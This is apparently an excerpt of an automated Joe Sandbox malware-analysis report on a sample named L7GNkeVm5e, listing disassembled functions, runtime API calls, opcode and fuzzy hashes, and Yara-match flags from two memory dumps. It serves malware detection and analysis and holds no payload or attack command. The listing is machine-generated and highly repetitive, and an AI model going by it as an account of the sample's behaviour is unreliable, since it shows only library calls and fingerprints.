                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3803302727-0
                                                                                                                                                                                                                                                  • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                                                                                                                                                                  • Instruction ID: a76a2f72e477ca486994031a60f313a94ba786dfa932fb32b5d480a511d1fb45
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CF0ED34A4021ABFCF10EFA4CD44EAF37B8AB00B01F600630B910E20E0DB75D6049BA4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___crtCreateEventExW.LIBCPMT ref: 0041231C
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00410B29), ref: 0041232A
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412340
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041234E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 200240550-0
                                                                                                                                                                                                                                                  • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                                                                                                                                                                  • Instruction ID: 1a74c5ccde1e3971b1c6c719148978c8dd05ce3529fe136f2ca3c66ce4c89eb0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DE0D8716002193AE714BB764D07FBF369C6B00B45F94082ABE14E11C3FDACD55041AC
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___crtCreateEventExW.LIBCPMT ref: 02112583
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,02110D90), ref: 02112591
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021125A7
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 021125B5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 200240550-0
                                                                                                                                                                                                                                                  • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                                                                                                                                                                  • Instruction ID: 14a9ac235ccb418f989956992e759e28d00d211dacbcb5c5a529ee316cb7bddb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DE0DF61A803292EEB10B7758C62FBB369C9B00B45F940835BD14E50C2FBB9D50449A8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 004126E2: TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8
                                                                                                                                                                                                                                                  • TlsAlloc.KERNEL32(?,00410B29), ref: 0042396F
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00423981
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00423997
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004239A5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3735082963-0
                                                                                                                                                                                                                                                  • Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                                                                                                                                                                  • Instruction ID: 15d2e13c7ff80a83f5b64d05c829fbc6b4bb44007b15bdef03250d0b5d6306aa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BE02B749002146FC704BF76AC4A66E3374750134A7A00E3FB012D2192EEBCD1844A9C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02112949: TlsAlloc.KERNEL32(?,02110D90), ref: 0211294F
                                                                                                                                                                                                                                                  • TlsAlloc.KERNEL32(?,02110D90), ref: 02123BD6
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 02123BE8
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02123BFE
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02123C0C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3735082963-0
                                                                                                                                                                                                                                                  • Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                                                                                                                                                                  • Instruction ID: fd78b02b340e69db4efb60985f6b5fd6d18d76ea2808b789d4a6c4968538f8d8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CE0D834880335AFC714BFB99C49A7E72686A01715B504E76F936D20A0EB39D11D4E6D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412527
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412536
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041254C
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041255A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3016159387-0
                                                                                                                                                                                                                                                  • Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                                                                                                                                                                  • Instruction ID: 385e35fad119ba3144d3df74fa1b3009f218c6b200c547ffcefd8a897afd490a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95E04874600119BBC714EFB5DF49AEF73BC7A01745BA0046AA501E2151EAACDA44877D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02110D90), ref: 0211278E
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02110D90), ref: 0211279D
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021127B3
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 021127C1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3016159387-0
                                                                                                                                                                                                                                                  • Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                                                                                                                                                                  • Instruction ID: c46788d47b77c55f04239fc3cbec975524c25257a152f225617b16dd5c2cf1e7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CE04F7464022AABCB10FBB59D49AAF73BC6E00B05B600475A901E2090EB79D6088B79
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetThreadPriority.KERNEL32(?,?), ref: 00412681
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041268D
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126A3
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004126B1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4286982218-0
                                                                                                                                                                                                                                                  • Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                                                                                                                                                                  • Instruction ID: c34ca93974de366a1d33064525cfd34c096e82c6d40c10065bdc34e64e282c71
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08E04F7460011A6BCB14BF619D06BAF37AC6A00745B50082AB515D10A2EEB9D56486AC
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • TlsSetValue.KERNEL32(?,00000000,00417961,00000000,?,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412747
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412753
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412769
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00412777
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1964976909-0
                                                                                                                                                                                                                                                  • Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                                                                                                                                                                  • Instruction ID: adcf13394f918fecad39acecb2caa88bdbfd7867240310386255d15fa00e1845
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADE04F346001196BDB10BF619E09AAF77A86A00A45F50442AB515D10A2EEB9E564969C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetThreadPriority.KERNEL32(?,?), ref: 021128E8
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 021128F4
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0211290A
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02112918
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4286982218-0
                                                                                                                                                                                                                                                  • Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                                                                                                                                                                  • Instruction ID: b976f7226a3d735f1d0548f86794f890ae1cb2c9ef70b0e61c3f2fccc9b48dd5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CEE0863414022D6FDB14BF65CC05FBF37ACAB00745F504835B915D10A4EB39D1149AAC
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • TlsSetValue.KERNEL32(?,00000000,02117BC8,00000000,?,?,02110D90,?,?,?,00000000,?,00000000), ref: 021129AE
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 021129BA
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021129D0
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 021129DE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1964976909-0
                                                                                                                                                                                                                                                  • Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                                                                                                                                                                  • Instruction ID: ea899c152b8793f98a15e989bb39d1af26b95bd3c807f54654ac51c44729bde7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10E04F341401296ADB10AF658C08BBA36696B00745B504835B919D20A4DB39D1148AA8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004126F5
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041270B
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00412719
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3103352999-0
                                                                                                                                                                                                                                                  • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                                                                                                                                                                  • Instruction ID: 1ad0294434ecfca40659a618dd28aba5f9447f5ceacad7becc2ff902d53fffbc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01E0CD3450011567C714BF759D09ABF72587901719BA00A1AF131D20D1EAACD458415C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • TlsAlloc.KERNEL32(?,02110D90), ref: 0211294F
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0211295C
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02112972
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02112980
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3103352999-0
                                                                                                                                                                                                                                                  • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                                                                                                                                                                  • Instruction ID: be241a68b6d72f46dbce8e5feff741b604a0d4df38facc4963aa0939c6d1e86d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BE0C2301401396B8724BB789C48A7F32A86A01B15FA00B35E861E20E4EB78D0084AA8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 0042F0FD
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                  • String ID: pow
                                                                                                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                  • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                                  • Instruction ID: a192877c9f0054c0872b9fb76e5ad9458d959ccc769b6dca3ba9f50539c5e518
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B515C61B0431296DB117B14E90137BBBB0AB54B00FE05D7FF491423A9EE3D8CA99A4F
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: s2C$s2C
                                                                                                                                                                                                                                                  • API String ID: 0-1833909196
                                                                                                                                                                                                                                                  • Opcode ID: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
                                                                                                                                                                                                                                                  • Instruction ID: de90a671c5843db736048dba6cdd1094f879e2809fe80a987d64bac264933c47
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F51E731E04205EBCB20DF54C982B6EB770FF19314F24915BD5599B3D1E6B8E982CB89
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0212895A
                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 02128A13
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                                                  • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                  • Instruction ID: fb84dd97583dcbc8924aa503de9c770b9ebbb38e953c2ce64d04d379562d258c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B411830A40228DFCF10DF28C844A9EBBB5BF85328F158165F9156B391D732DA29CFA1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0B4,?,00000050,?,?,?,?,?), ref: 0043AF34
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                  • API String ID: 0-711371036
                                                                                                                                                                                                                                                  • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                  • Instruction ID: e3ba11e5d781d2b130423e2bf0cbd093d466219ebf659edcdfcd25fe82a6d734
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2214BA2AC0101A6DB30CB55C902B9B7356EF6CB24F569526EA89C7300F73EDD11C35E
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0213B31B,?,00000050,?,?,?,?,?), ref: 0213B19B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                  • API String ID: 0-711371036
                                                                                                                                                                                                                                                  • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                  • Instruction ID: efee00f6e902b0987927375d3dd53610df83714782a62f8e0d7e042edc218313
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87215362BD9105A6EB368F54ED01B9773ABEB44B6DF578424E909D7100F732DB40C394
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F1B
                                                                                                                                                                                                                                                  • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F40
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
